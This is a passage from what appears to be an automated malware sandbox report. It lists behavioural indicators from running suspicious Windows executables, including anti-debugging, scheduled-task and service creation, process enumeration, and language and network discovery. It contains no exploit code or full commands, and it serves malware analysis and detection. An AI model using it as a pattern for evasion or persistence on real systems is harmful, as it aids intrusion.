| File opened for modification | C:\Windows\SysWOW64\symbols\dll\advapi32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\bcrypt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\msvcp_win.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ncrypt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\combase.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\dbghelp.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DLL\dbgcore.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ntasn1.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\bcryptprimitives.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wkernel32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\apphelp.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\wrpcrt4.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\shell32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\wntdll.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcp_win.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\combase.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\LB31.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DLL\wkernel32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\sechost.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\bcrypt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\ncrypt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\iphlpapi.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wwin32u.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\ucrtbase.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\bcrypt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\combase.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\apphelp.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\comctl32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\wuser32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\advapi32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\sechost.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\gdiplus.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\crypt32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\ole32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Kernel.Appcore.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\MeshService.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\apphelp.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\crypt32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wuser32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\shell32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\shcore.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wntdll.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\wkernelbase.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\comctl32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\msvcrt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\msvcrt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\wuser32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Files\Client_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\a\rh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\a\L.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d75b00c9-86a3-411f-9853-c2e352bce808.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File created | C:\Program Files (x86)\MountTaiSoftware\Lodop\NPCAOSOFT_WEB_PRINT_lodop.dll | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| File created | C:\Program Files (x86)\Mesh Agent\MeshAgent.db | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Program Files (x86)\Mesh Agent\MeshAgent.msh | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241127004007.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File created | C:\Program Files (x86)\MountTaiSoftware\Lodop\CAOSOFT_WEB_PRINT_lodop.ocx | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| File created | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mesh Agent\MeshAgent.db | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Tasks\UAC.job | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\PermitLite | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\JennyArtistic | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\TeddySecretariat | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\CentralAvoiding | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\OrganDiscretion | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\CameroonBuses | C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe | N/A |
| File opened for modification | C:\Windows\VatBukkake | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\PossessDescriptions | C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe | N/A |
| File opened for modification | C:\Windows\ConsolidationDistinct | C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\GeniusRepeat | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\XiMilton | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\JoiningMazda | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\MozambiqueAppropriate | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File created | C:\Windows\Tasks\UAC.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\TrainsSexcam | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\GamingNat | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\UruguayNorthern | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\IdeasApp | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\Desktop\Files\Opdxdyeul.exe | N/A |
| File opened for modification | C:\Windows\PolyphonicWeblog | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\DownReceptor | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\ComfortSick | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| File opened for modification | C:\Windows\BackedIma | C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe | N/A |
| File opened for modification | C:\Windows\SgLaid | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\MissWheat | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\FlickrRealm | C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe | N/A |
| File opened for modification | C:\Windows\FacingLone | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\EditedRights | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| File opened for modification | C:\Windows\KeyboardsTwin | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\a\7mpPLxE.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Installeraus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\euoxkxg\cqibun.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\crypted8888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\stail.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fontdrvhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ARP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\25072023.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Opdxdyeul.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tftp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\euoxkxg\cqibun.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\._cache_frap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
